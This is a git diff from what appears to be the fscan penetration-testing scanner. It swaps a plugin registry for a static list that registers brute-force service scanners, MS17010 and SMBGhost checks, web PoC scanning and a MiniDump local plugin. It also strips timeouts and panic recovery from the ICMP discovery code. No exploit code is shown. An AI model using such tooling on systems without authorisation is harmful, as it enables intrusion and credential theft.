-	"kafka_auth_failed": {
-		LangZH: "Kafka认证失败: %v",
-		LangEN: "Kafka authentication failed: %v",
-	},
-	"ftp_directory_found": {
-		LangZH: "发现FTP目录: %s",
-		LangEN: "FTP directories found: %s",
-	},
-	"ftp_file_found": {
-		LangZH: "发现FTP文件: %s",
-		LangEN: "FTP files found: %s",
-	},
-	"ftp_upload_success": {
-		LangZH: "FTP文件上传成功: %s",
-		LangEN: "FTP file upload successful: %s",
-	},
-	"ftp_download_success": {
-		LangZH: "FTP文件下载成功: %s",
-		LangEN: "FTP file download successful: %s",
-	},
-
-	// FTP利用方法名称
-	"exploit_method_name_directory_enumeration": {
-		LangZH: "目录枚举",
-		LangEN: "Directory Enumeration",
-	},
-	"exploit_method_name_file_download_test": {
-		LangZH: "文件下载测试",
-		LangEN: "File Download Test",
-	},
-	"exploit_method_name_file_upload_test": {
-		LangZH: "文件上传测试",
-		LangEN: "File Upload Test",
-	},
-}

Common/i18n/messages/scan.go

@@ -38,10 +38,6 @@ var ScanMessages = map[string]map[string]string{
 		LangZH: "开始漏洞扫描",
 		LangEN: "Starting vulnerability scan",
 	},
-	"scan_service_plugins": {
-		LangZH: "使用服务扫描插件: %s",
-		LangEN: "Using service scan plugins: %s",
-	},
 	"scan_no_service_plugins": {
 		LangZH: "未找到可用的服务插件",
 		LangEN: "No available service plugins found",
@@ -224,10 +220,6 @@ var ScanMessages = map[string]map[string]string{
 		LangZH: "端口扫描",
 		LangEN: "Port Scanning",
 	},
-	"progress_port_scanning_with_threads": {
-		LangZH: "端口扫描 (线程:%d)",
-		LangEN: "Port Scanning (Threads:%d)",
-	},
 	"progress_scan_completed": {
 		LangZH: "扫描完成:",
 		LangEN: "Scan Completed:",
@@ -240,44 +232,4 @@ var ScanMessages = map[string]map[string]string{
 		LangZH: "开放端口",
 		LangEN: "Open Ports",
 	},
-
-	// ========================= 并发状态消息 =========================
-	"concurrency_plugin": {
-		LangZH: "插件",
-		LangEN: "Plugins",
-	},
-	"concurrency_connection": {
-		LangZH: "连接",
-		LangEN: "Conns",
-	},
-	"concurrency_plugin_tasks": {
-		LangZH: "活跃插件任务",
-		LangEN: "Active Plugin Tasks",
-	},
-	"concurrency_connection_details": {
-		LangZH: "连接详情",
-		LangEN: "Connection Details",
-	},
-	"concurrency_no_active_tasks": {
-		LangZH: "无活跃任务",
-		LangEN: "No Active Tasks",
-	},
-
-	// ========================= 扫描配置消息 =========================
-	"scan_config_thread_num": {
-		LangZH: "端口扫描线程数: %d",
-		LangEN: "Port scan threads: %d",
-	},
-	"scan_config_timeout": {
-		LangZH: "连接超时: %ds",
-		LangEN: "Connection timeout: %ds",
-	},
-	"scan_config_module_thread_num": {
-		LangZH: "插件内线程数: %d",
-		LangEN: "Plugin threads: %d",
-	},
-	"scan_config_global_timeout": {
-		LangZH: "单个插件全局超时: %ds",
-		LangEN: "Plugin global timeout: %ds",
-	},
 }

Common/parsers/Simple.go

@@ -290,6 +290,11 @@ func parsePortRange(rangeStr string) []int {
 	var ports []int
 	for i := start; i <= end; i++ {
 		ports = append(ports, i)
+		
+		// 限制端口范围大小
+		if len(ports) > SimpleMaxPortRange {
+			break
+		}
 	}
 
 	return ports

Common/parsers/constants.go

@@ -184,6 +184,7 @@ func GetCommonSecondOctets() []int {
 const (
 	// 端口和主机限制
 	SimpleMaxHosts               = 10000
+	SimpleMaxPortRange           = 5000
 	
 	// 网段简写展开
 	DefaultGatewayLastOctet      = 1

Common/utils/memmonitor.go

@@ -1,140 +0,0 @@
-package utils
-
-import (
-	"log"
-	"runtime"
-	"time"
-)
-
-// MemoryMonitor 内存监控器
-type MemoryMonitor struct {
-	maxHeapMB      uint64 // 最大堆内存阈值(MB)
-	maxGoroutines  int    // 最大goroutine数量阈值
-	checkInterval  time.Duration // 检查间隔
-	running        bool   // 是否运行中
-	stopChan       chan bool
-}
-
-// NewMemoryMonitor 创建新的内存监控器
-func NewMemoryMonitor(maxHeapMB uint64, maxGoroutines int, checkInterval time.Duration) *MemoryMonitor {
-	return &MemoryMonitor{
-		maxHeapMB:     maxHeapMB,
-		maxGoroutines: maxGoroutines,
-		checkInterval: checkInterval,
-		stopChan:      make(chan bool, 1),
-	}
-}
-
-// Start 启动内存监控
-func (mm *MemoryMonitor) Start() {
-	if mm.running {
-		return
-	}
-	
-	mm.running = true
-	go mm.monitor()
-}
-
-// Stop 停止内存监控
-func (mm *MemoryMonitor) Stop() {
-	if !mm.running {
-		return
-	}
-	
-	mm.running = false
-	select {
-	case mm.stopChan <- true:
-	default:
-	}
-}
-
-// monitor 监控循环
-func (mm *MemoryMonitor) monitor() {
-	ticker := time.NewTicker(mm.checkInterval)
-	defer ticker.Stop()
-	
-	for {
-		select {
-		case <-ticker.C:
-			mm.checkMemory()
-		case <-mm.stopChan:
-			return
-		}
-	}
-}
-
-// checkMemory 检查内存使用情况
-func (mm *MemoryMonitor) checkMemory() {
-	var m runtime.MemStats
-	runtime.ReadMemStats(&m)
-	
-	heapMB := m.HeapInuse / 1024 / 1024
-	goroutineCount := runtime.NumGoroutine()
-	
-	// 检查堆内存使用
-	if heapMB > mm.maxHeapMB {
-		log.Printf("[WARN] 内存使用警告: 堆内存使用过高 %d MB (阈值: %d MB)", heapMB, mm.maxHeapMB)
-		
-		// 尝试触发GC
-		runtime.GC()
-		
-		// 再次检查
-		runtime.ReadMemStats(&m)
-		heapMBAfterGC := m.HeapInuse / 1024 / 1024
-		log.Printf("[INFO] GC后堆内存: %d MB", heapMBAfterGC)
-	}
-	
-	// 检查goroutine数量
-	if goroutineCount > mm.maxGoroutines {
-		log.Printf("[WARN] Goroutine数量警告: 当前数量 %d (阈值: %d)", goroutineCount, mm.maxGoroutines)
-	}
-}
-
-// GetMemoryStats 获取当前内存统计信息
-func (mm *MemoryMonitor) GetMemoryStats() map[string]interface{} {
-	var m runtime.MemStats
-	runtime.ReadMemStats(&m)
-	
-	return map[string]interface{}{
-		"heap_inuse_mb":    m.HeapInuse / 1024 / 1024,
-		"heap_alloc_mb":    m.HeapAlloc / 1024 / 1024,
-		"sys_mb":           m.Sys / 1024 / 1024,
-		"num_gc":           m.NumGC,
-		"num_goroutines":   runtime.NumGoroutine(),
-		"last_gc_time":     time.Unix(0, int64(m.LastGC)),
-	}
-}
-
-// ForceGC 强制执行垃圾回收
-func (mm *MemoryMonitor) ForceGC() {
-	before := mm.getHeapSize()
-	runtime.GC()
-	after := mm.getHeapSize()
-	
-	// 使用log包直接输出，避免undefined common错误
-	log.Printf("[INFO] 强制GC: 释放内存 %d MB", (before-after)/1024/1024)
-}
-
-// getHeapSize 获取当前堆大小
-func (mm *MemoryMonitor) getHeapSize() uint64 {
-	var m runtime.MemStats
-	runtime.ReadMemStats(&m)
-	return m.HeapInuse
-}
-
-// 默认内存监控器实例
-var DefaultMemMonitor = NewMemoryMonitor(
-	512,             // 最大堆内存512MB
-	1000,            // 最大1000个goroutines
-	30*time.Second,  // 30秒检查一次
-)
-
-// StartDefaultMonitor 启动默认内存监控器
-func StartDefaultMonitor() {
-	DefaultMemMonitor.Start()
-}
-
-// StopDefaultMonitor 停止默认内存监控器
-func StopDefaultMonitor() {
-	DefaultMemMonitor.Stop()
-}

Core/BaseScanStrategy.go

@@ -51,10 +51,10 @@ func (b *BaseScanStrategy) GetPlugins() ([]string, bool) {
 			requestedPlugins = []string{common.ScanMode}
 		}
 
-		// 验证插件是否存在（使用新插件系统）
+		// 验证插件是否存在
 		var validPlugins []string
 		for _, name := range requestedPlugins {
-			if GlobalPluginAdapter.PluginExists(name) {
+			if _, exists := common.PluginManager[name]; exists {
 				validPlugins = append(validPlugins, name)
 			}
 		}
@@ -63,7 +63,7 @@ func (b *BaseScanStrategy) GetPlugins() ([]string, bool) {
 	}
 
 	// 未指定或使用"all"：获取所有插件，由IsPluginApplicable做类型过滤
-	return GlobalPluginAdapter.GetAllPluginNames(), false
+	return GetAllPlugins(), false
 }
 
 // GetApplicablePlugins 获取适用的插件列表（用于日志显示）
@@ -74,11 +74,12 @@ func (b *BaseScanStrategy) GetApplicablePlugins(allPlugins []string, isCustomMod
 
 	var applicablePlugins []string
 	for _, pluginName := range allPlugins {
-		if !GlobalPluginAdapter.PluginExists(pluginName) {
+		plugin, exists := common.PluginManager[pluginName]
+		if !exists {
 			continue
 		}
 
-		if b.isPluginTypeMatchedByName(pluginName) {
+		if b.isPluginTypeMatched(plugin) {
 			applicablePlugins = append(applicablePlugins, pluginName)
 		}
 	}
@@ -86,25 +87,6 @@ func (b *BaseScanStrategy) GetApplicablePlugins(allPlugins []string, isCustomMod
 	return applicablePlugins
 }
 
-// isPluginTypeMatchedByName 根据插件名称检查类型是否匹配过滤器
-func (b *BaseScanStrategy) isPluginTypeMatchedByName(pluginName string) bool {
-	metadata := GlobalPluginAdapter.registry.GetMetadata(pluginName)
-	if metadata == nil {
-		return false
-	}
-
-	switch b.filterType {
-	case FilterLocal:
-		return metadata.Category == "local"
-	case FilterService:
-		return metadata.Category == "service"
-	case FilterWeb:
-		return metadata.Category == "web"
-	default:
-		return true
-	}
-}
-
 // isPluginTypeMatched 检查插件类型是否匹配过滤器
 func (b *BaseScanStrategy) isPluginTypeMatched(plugin common.ScanPlugin) bool {
 	switch b.filterType {
@@ -119,36 +101,6 @@ func (b *BaseScanStrategy) isPluginTypeMatched(plugin common.ScanPlugin) bool {
 	}
 }
 
-// IsPluginApplicableByName 根据插件名称判断是否适用（新方法）
-func (b *BaseScanStrategy) IsPluginApplicableByName(pluginName string, targetPort int, isCustomMode bool) bool {
-	// 自定义模式下运行所有明确指定的插件
-	if isCustomMode {
-		return true
-	}
-
-	metadata := GlobalPluginAdapter.registry.GetMetadata(pluginName)
-	if metadata == nil {
-		return false
-	}
-
-	// 检查类型匹配
-	if !b.isPluginTypeMatchedByName(pluginName) {
-		return false
-	}
-
-	// 检查端口匹配（如果指定了端口）
-	if targetPort > 0 && len(metadata.Ports) > 0 {
-		for _, port := range metadata.Ports {
-			if port == targetPort {
-				return true
-			}
-		}
-		return false
-	}
-
-	return true
-}
-
 // IsPluginApplicable 判断插件是否适用（通用实现）
 func (b *BaseScanStrategy) IsPluginApplicable(plugin common.ScanPlugin, targetPort int, isCustomMode bool) bool {
 	// 自定义模式下运行所有明确指定的插件

Core/ICMP.go

@@ -163,41 +163,16 @@ func RunIcmp1(hostslist []string, conn *icmp.PacketConn, chanHosts chan string,
 
 	// 启动监听协程
 	go func() {
-		defer func() {
-			if r := recover(); r != nil {
-				common.LogError(fmt.Sprintf("ICMP监听协程异常: %v", r))
-			}
-		}()
-		
 		for {
 			if endflag {
 				return
 			}
-			
-			// 设置读取超时避免无限期阻塞
-			conn.SetReadDeadline(time.Now().Add(100 * time.Millisecond))
-			
 			// 接收ICMP响应
 			msg := make([]byte, 100)
-			_, sourceIP, err := conn.ReadFrom(msg)
-			
-			if err != nil {
-				// 超时错误正常，其他错误则退出
-				if netErr, ok := err.(net.Error); ok && netErr.Timeout() {
-					continue
-				}
-				return
-			}
-			
+			_, sourceIP, _ := conn.ReadFrom(msg)
 			if sourceIP != nil {
 				livewg.Add(1)
-				select {
-				case chanHosts <- sourceIP.String():
-					// 成功发送
-				default:
-					// channel已满或已关闭，丢弃数据并减少计数
-					livewg.Done()
-				}
+				chanHosts <- sourceIP.String()
 			}
 		}
 	}()
@@ -257,13 +232,7 @@ func RunIcmp2(hostslist []string, chanHosts chan string) {
 
 			if icmpalive(host) {
 				livewg.Add(1)
-				select {
-				case chanHosts <- host:
-					// 成功发送
-				default:
-					// channel已满或已关闭，丢弃数据并减少计数
-					livewg.Done()
-				}
+				chanHosts <- host
 			}
 		}(host)
 	}
@@ -322,13 +291,7 @@ func RunPing(hostslist []string, chanHosts chan string) {
 
 			if ExecCommandPing(host) {
 				livewg.Add(1)
-				select {
-				case chanHosts <- host:
-					// 成功发送
-				default:
-					// channel已满或已关闭，丢弃数据并减少计数
-					livewg.Done()
-				}
+				chanHosts <- host
 			}
 		}(host)
 	}

Core/PluginAdapter.go

@@ -1,135 +0,0 @@
-package core
-
-import (
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// PluginAdapter 插件适配器
-// 提供从新插件系统到旧扫描接口的适配
-type PluginAdapter struct {
-	registry *base.PluginRegistry
-}
-
-// NewPluginAdapter 创建插件适配器
-func NewPluginAdapter() *PluginAdapter {
-	return &PluginAdapter{
-		registry: base.GlobalPluginRegistry,
-	}
-}
-
-// 全局插件适配器实例
-var GlobalPluginAdapter = NewPluginAdapter()
-
-// GetAllPluginNames 获取所有插件名称
-func (pa *PluginAdapter) GetAllPluginNames() []string {
-	return pa.registry.GetAll()
-}
-
-// PluginExists 检查插件是否存在
-func (pa *PluginAdapter) PluginExists(name string) bool {
-	metadata := pa.registry.GetMetadata(name)
-	return metadata != nil
-}
-
-// GetPluginPorts 获取插件支持的端口
-func (pa *PluginAdapter) GetPluginPorts(name string) []int {
-	metadata := pa.registry.GetMetadata(name)
-	if metadata != nil {
-		return metadata.Ports
-	}
-	return []int{}
-}
-
-// GetPluginsByPort 根据端口获取支持的插件
-func (pa *PluginAdapter) GetPluginsByPort(port int) []string {
-	var plugins []string
-	for _, name := range pa.registry.GetAll() {
-		metadata := pa.registry.GetMetadata(name)
-		if metadata != nil {
-			for _, p := range metadata.Ports {
-				if p == port {
-					plugins = append(plugins, name)
-					break
-				}
-			}
-		}
-	}
-	return plugins
-}
-
-// GetPluginsByType 根据类型获取插件
-func (pa *PluginAdapter) GetPluginsByType(pluginType string) []string {
-	var plugins []string
-	for _, name := range pa.registry.GetAll() {
-		metadata := pa.registry.GetMetadata(name)
-		if metadata != nil {
-			if metadata.Category == pluginType {
-				plugins = append(plugins, name)
-			}
-		}
-	}
-	return plugins
-}
-
-// ScanWithPlugin 使用插件进行扫描
-func (pa *PluginAdapter) ScanWithPlugin(pluginName string, info *common.HostInfo) error {
-	common.LogDebug(fmt.Sprintf("使用新插件架构扫描: %s", pluginName))
-	
-	// 创建插件实例
-	plugin, err := pa.registry.Create(pluginName)
-	if err != nil {
-		return fmt.Errorf("创建插件 %s 失败: %v", pluginName, err)
-	}
-
-	// 执行扫描
-	result, err := plugin.Scan(context.Background(), info)
-	if err != nil {
-		return fmt.Errorf("插件 %s 扫描失败: %v", pluginName, err)
-	}
-
-	// 处理扫描结果
-	if result != nil && result.Success {
-		common.LogDebug(fmt.Sprintf("插件 %s 扫描成功", pluginName))
-	}
-
-	return nil
-}
-
-// FilterPluginsByType 按类型过滤插件名称
-func FilterPluginsByType(pluginType string) func(name string) bool {
-	return func(name string) bool {
-		metadata := GlobalPluginAdapter.registry.GetMetadata(name)
-		if metadata == nil {
-			return false
-		}
-		
-		switch pluginType {
-		case common.PluginTypeService:
-			return metadata.Category == "service"
-		case common.PluginTypeWeb:
-			return metadata.Category == "web"
-		case common.PluginTypeLocal:
-			return metadata.Category == "local"
-		default:
-			return true
-		}
-	}
-}
-
-// GetServicePlugins 获取所有服务插件
-func GetServicePlugins() []string {
-	return GlobalPluginAdapter.GetPluginsByType("service")
-}
-
-// GetWebPlugins 获取所有Web插件
-func GetWebPlugins() []string {
-	return GlobalPluginAdapter.GetPluginsByType("web")
-}
-
-// GetLocalPlugins 获取所有本地插件
-func GetLocalPlugins() []string {
-	return GlobalPluginAdapter.GetPluginsByType("local")
-}

Core/PluginUtils.go

@@ -42,10 +42,10 @@ func validateScanPlugins() error {
 		plugins = []string{common.ScanMode}
 	}
 
-	// 验证每个插件是否有效（使用新插件系统）
+	// 验证每个插件是否有效
 	var invalidPlugins []string
 	for _, plugin := range plugins {
-		if !GlobalPluginAdapter.PluginExists(plugin) {
+		if _, exists := common.PluginManager[plugin]; !exists {
 			invalidPlugins = append(invalidPlugins, plugin)
 		}
 	}

Core/PortScan.go

@@ -43,7 +43,7 @@ func EnhancedPortScan(hosts []string, ports string, timeout int64) []string {
 
 	// 初始化端口扫描进度条
 	if totalTasks > 0 && common.ShowProgress {
-		description := i18n.GetText("progress_port_scanning_with_threads", common.ThreadNum)
+		description := i18n.GetText("progress_port_scanning")
 		common.InitProgressBar(int64(totalTasks), description)
 	}
 

Core/Registry.go

@@ -1,97 +1,290 @@
 package core
 
 import (
-	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-	
-	// 导入新架构插件，触发自动注册
-	_ "github.com/shadow1ng/fscan/plugins/services/activemq"
-	_ "github.com/shadow1ng/fscan/plugins/services/cassandra"
-	_ "github.com/shadow1ng/fscan/plugins/services/ftp"
-	_ "github.com/shadow1ng/fscan/plugins/services/imap"
-	_ "github.com/shadow1ng/fscan/plugins/services/kafka"
-	_ "github.com/shadow1ng/fscan/plugins/services/mysql"
-	_ "github.com/shadow1ng/fscan/plugins/services/redis" 
-	_ "github.com/shadow1ng/fscan/plugins/services/ssh"
+	"github.com/shadow1ng/fscan/common/parsers"
+	"github.com/shadow1ng/fscan/plugins"
+	"sort"
 )
 
-// =============================================================================
-// 新一代插件注册系统 (New Architecture)
-// 完全基于工厂模式和自动发现的现代化插件架构
-// =============================================================================
-
-// InitializePluginSystem 初始化插件系统
-func InitializePluginSystem() error {
-	common.LogInfo("初始化新一代插件系统...")
-	
-	// 统计已注册的插件
-	registeredPlugins := base.GlobalPluginRegistry.GetAll()
-	common.LogInfo(fmt.Sprintf("已注册插件数量: %d", len(registeredPlugins)))
-	
-	// 显示已注册的插件列表
-	if len(registeredPlugins) > 0 {
-		common.LogInfo("已注册插件:")
-		for _, name := range registeredPlugins {
-			metadata := base.GlobalPluginRegistry.GetMetadata(name)
-			if metadata != nil {
-				common.LogInfo(fmt.Sprintf("  - %s v%s (%s)", 
-					metadata.Name, metadata.Version, metadata.Category))
-			}
-		}
-	}
-	
-	common.LogInfo("插件系统初始化完成")
-	return nil
-}
-
-// GetAllPlugins 获取所有已注册插件名称
-func GetAllPlugins() []string {
-	return base.GlobalPluginRegistry.GetAll()
-}
-
-// GetPluginMetadata 获取插件元数据
-func GetPluginMetadata(name string) *base.PluginMetadata {
-	return base.GlobalPluginRegistry.GetMetadata(name)
-}
-
-// CreatePlugin 创建插件实例
-func CreatePlugin(name string) (base.Plugin, error) {
-	return base.GlobalPluginRegistry.Create(name)
-}
-
-// GetPluginsByCategory 按类别获取插件
-func GetPluginsByCategory(category string) []string {
-	var plugins []string
-	for _, name := range base.GlobalPluginRegistry.GetAll() {
-		if metadata := base.GlobalPluginRegistry.GetMetadata(name); metadata != nil {
-			if metadata.Category == category {
-				plugins = append(plugins, name)
-			}
-		}
-	}
-	return plugins
-}
-
-// GetPluginsByPort 按端口获取插件  
-func GetPluginsByPort(port int) []string {
-	var plugins []string
-	for _, name := range base.GlobalPluginRegistry.GetAll() {
-		if metadata := base.GlobalPluginRegistry.GetMetadata(name); metadata != nil {
-			for _, p := range metadata.Ports {
-				if p == port {
-					plugins = append(plugins, name)
-					break
-				}
-			}
-		}
-	}
-	return plugins
-}
-
-// init 自动初始化插件系统
+// init 初始化并注册所有扫描插件
+// 包括标准端口服务扫描、特殊扫描类型和本地信息收集等
 func init() {
-	if err := InitializePluginSystem(); err != nil {
-		common.LogError("插件系统初始化失败: " + err.Error())
+	// 1. 标准网络服务扫描插件
+	// 文件传输和远程访问服务
+	common.RegisterPlugin("ftp", common.ScanPlugin{
+		Name:     "FTP",
+		Ports:    []int{21},
+		ScanFunc: Plugins.FtpScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("ssh", common.ScanPlugin{
+		Name:     "SSH",
+		Ports:    []int{22, 2222},
+		ScanFunc: Plugins.SshScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("telnet", common.ScanPlugin{
+		Name:     "Telnet",
+		Ports:    []int{23},
+		ScanFunc: Plugins.TelnetScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// Windows网络服务
+	common.RegisterPlugin("findnet", common.ScanPlugin{
+		Name:     "FindNet",
+		Ports:    []int{135},
+		ScanFunc: Plugins.Findnet,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("netbios", common.ScanPlugin{
+		Name:     "NetBIOS",
+		Ports:    []int{139},
+		ScanFunc: Plugins.NetBIOS,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("smb", common.ScanPlugin{
+		Name:     "SMB",
+		Ports:    []int{445},
+		ScanFunc: Plugins.SmbScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 数据库服务
+	common.RegisterPlugin("mssql", common.ScanPlugin{
+		Name:     "MSSQL",
+		Ports:    []int{1433, 1434},
+		ScanFunc: Plugins.MssqlScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("oracle", common.ScanPlugin{
+		Name:     "Oracle",
+		Ports:    []int{1521, 1522, 1526},
+		ScanFunc: Plugins.OracleScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("mysql", common.ScanPlugin{
+		Name:     "MySQL",
+		Ports:    []int{3306, 3307, 13306, 33306},
+		ScanFunc: Plugins.MysqlScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 中间件和消息队列服务
+	common.RegisterPlugin("elasticsearch", common.ScanPlugin{
+		Name:     "Elasticsearch",
+		Ports:    []int{9200, 9300},
+		ScanFunc: Plugins.ElasticScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("rabbitmq", common.ScanPlugin{
+		Name:     "RabbitMQ",
+		Ports:    []int{5672, 5671, 15672, 15671},
+		ScanFunc: Plugins.RabbitMQScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("kafka", common.ScanPlugin{
+		Name:     "Kafka",
+		Ports:    []int{9092, 9093},
+		ScanFunc: Plugins.KafkaScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("activemq", common.ScanPlugin{
+		Name:     "ActiveMQ",
+		Ports:    []int{61613},
+		ScanFunc: Plugins.ActiveMQScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 目录和认证服务
+	common.RegisterPlugin("ldap", common.ScanPlugin{
+		Name:     "LDAP",
+		Ports:    []int{389, 636},
+		ScanFunc: Plugins.LDAPScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 邮件服务
+	common.RegisterPlugin("smtp", common.ScanPlugin{
+		Name:     "SMTP",
+		Ports:    []int{25, 465, 587},
+		ScanFunc: Plugins.SmtpScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("imap", common.ScanPlugin{
+		Name:     "IMAP",
+		Ports:    []int{143, 993},
+		ScanFunc: Plugins.IMAPScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("pop3", common.ScanPlugin{
+		Name:     "POP3",
+		Ports:    []int{110, 995},
+		ScanFunc: Plugins.POP3Scan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 网络管理和监控服务
+	common.RegisterPlugin("snmp", common.ScanPlugin{
+		Name:     "SNMP",
+		Ports:    []int{161, 162},
+		ScanFunc: Plugins.SNMPScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("modbus", common.ScanPlugin{
+		Name:     "Modbus",
+		Ports:    []int{502, 5020},
+		ScanFunc: Plugins.ModbusScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 数据同步和备份服务
+	common.RegisterPlugin("rsync", common.ScanPlugin{
+		Name:     "Rsync",
+		Ports:    []int{873},
+		ScanFunc: Plugins.RsyncScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// NoSQL数据库
+	common.RegisterPlugin("cassandra", common.ScanPlugin{
+		Name:     "Cassandra",
+		Ports:    []int{9042},
+		ScanFunc: Plugins.CassandraScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("neo4j", common.ScanPlugin{
+		Name:     "Neo4j",
+		Ports:    []int{7687},
+		ScanFunc: Plugins.Neo4jScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 远程桌面和显示服务
+	common.RegisterPlugin("rdp", common.ScanPlugin{
+		Name:     "RDP",
+		Ports:    []int{3389, 13389, 33389},
+		ScanFunc: Plugins.RdpScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("postgres", common.ScanPlugin{
+		Name:     "PostgreSQL",
+		Ports:    []int{5432, 5433},
+		ScanFunc: Plugins.PostgresScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("vnc", common.ScanPlugin{
+		Name:     "VNC",
+		Ports:    []int{5900, 5901, 5902},
+		ScanFunc: Plugins.VncScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 缓存和键值存储服务
+	common.RegisterPlugin("redis", common.ScanPlugin{
+		Name:     "Redis",
+		Ports:    []int{6379, 6380, 16379},
+		ScanFunc: Plugins.RedisScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("memcached", common.ScanPlugin{
+		Name:     "Memcached",
+		Ports:    []int{11211},
+		ScanFunc: Plugins.MemcachedScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("mongodb", common.ScanPlugin{
+		Name:     "MongoDB",
+		Ports:    []int{27017, 27018},
+		ScanFunc: Plugins.MongodbScan,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 2. 特殊漏洞扫描插件
+	common.RegisterPlugin("ms17010", common.ScanPlugin{
+		Name:     "MS17010",
+		Ports:    []int{445},
+		ScanFunc: Plugins.MS17010,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	common.RegisterPlugin("smbghost", common.ScanPlugin{
+		Name:     "SMBGhost",
+		Ports:    []int{445},
+		ScanFunc: Plugins.SmbGhost,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 3. Web应用扫描插件
+	common.RegisterPlugin("webtitle", common.ScanPlugin{
+		Name:     "WebTitle",
+		Ports:    parsers.ParsePortsFromString(common.WebPorts),
+		ScanFunc: Plugins.WebTitle,
+		Types:    []string{common.PluginTypeWeb},
+	})
+
+	common.RegisterPlugin("webpoc", common.ScanPlugin{
+		Name:     "WebPoc",
+		Ports:    parsers.ParsePortsFromString(common.WebPorts),
+		ScanFunc: Plugins.WebPoc,
+		Types:    []string{common.PluginTypeWeb},
+	})
+
+	// 4. Windows系统专用插件
+	common.RegisterPlugin("smb2", common.ScanPlugin{
+		Name:     "SMBScan2",
+		Ports:    []int{445},
+		ScanFunc: Plugins.SmbScan2,
+		Types:    []string{common.PluginTypeService},
+	})
+
+	// 5. 本地信息收集插件
+	common.RegisterPlugin("localinfo", common.ScanPlugin{
+		Name:     "LocalInfo",
+		Ports:    []int{},
+		ScanFunc: Plugins.LocalInfoScan,
+		Types:    []string{common.PluginTypeLocal},
+	})
+
+	common.RegisterPlugin("dcinfo", common.ScanPlugin{
+		Name:     "DCInfo",
+		Ports:    []int{},
+		ScanFunc: Plugins.DCInfoScan,
+		Types:    []string{common.PluginTypeLocal},
+	})
+
+	common.RegisterPlugin("minidump", common.ScanPlugin{
+		Name:     "MiniDump",
+		Ports:    []int{},
+		ScanFunc: Plugins.MiniDump,
+		Types:    []string{common.PluginTypeLocal},
+	})
+}
+
+// GetAllPlugins 返回所有已注册插件的名称列表
+func GetAllPlugins() []string {
+	pluginNames := make([]string, 0, len(common.PluginManager))
+	for name := range common.PluginManager {
+		pluginNames = append(pluginNames, name)
 	}
-}
+	sort.Strings(pluginNames)
+	return pluginNames
+}

Core/Scanner.go

@@ -19,7 +19,6 @@ type ScanStrategy interface {
 	// 插件管理方法
 	GetPlugins() ([]string, bool)
 	IsPluginApplicable(plugin common.ScanPlugin, targetPort int, isCustomMode bool) bool
-	IsPluginApplicableByName(pluginName string, targetPort int, isCustomMode bool) bool
 }
 
 // selectStrategy 根据扫描配置选择适当的扫描策略
@@ -95,12 +94,13 @@ func ExecuteScanTasks(targets []common.HostInfo, strategy ScanStrategy, ch *chan
 		}
 
 		for _, pluginName := range pluginsToRun {
-			if !GlobalPluginAdapter.PluginExists(pluginName) {
+			plugin, exists := common.PluginManager[pluginName]
+			if !exists {
 				continue
 			}
 
 			// 检查插件是否适用于当前目标
-			if strategy.IsPluginApplicableByName(pluginName, targetPort, isCustomMode) {
+			if strategy.IsPluginApplicable(plugin, targetPort, isCustomMode) {
 				executeScanTask(pluginName, target, ch, wg)
 			}
 		}
@@ -117,8 +117,8 @@ func countApplicableTasks(targets []common.HostInfo, pluginsToRun []string, isCu
 		}
 
 		for _, pluginName := range pluginsToRun {
-			if GlobalPluginAdapter.PluginExists(pluginName) && 
-			   strategy.IsPluginApplicableByName(pluginName, targetPort, isCustomMode) {
+			plugin, exists := common.PluginManager[pluginName]
+			if exists && strategy.IsPluginApplicable(plugin, targetPort, isCustomMode) {
 				count++
 			}
 		}
@@ -133,10 +133,6 @@ func executeScanTask(pluginName string, target common.HostInfo, ch *chan struct{
 	*ch <- struct{}{} // 获取并发槽位
 
 	go func() {
-		// 开始监控插件任务
-		monitor := common.GetConcurrencyMonitor()
-		monitor.StartPluginTask()
-		
 		defer func() {
 			// 捕获并记录任何可能的panic
 			if r := recover(); r != nil {
@@ -145,7 +141,6 @@ func executeScanTask(pluginName string, target common.HostInfo, ch *chan struct{
 			}
 
 			// 完成任务，释放资源
-			monitor.FinishPluginTask()
 			wg.Done()
 			<-*ch // 释放并发槽位
 		}()
@@ -154,8 +149,14 @@ func executeScanTask(pluginName string, target common.HostInfo, ch *chan struct{
 		atomic.AddInt64(&common.Num, 1)
 		common.UpdateProgressBar(1)
 
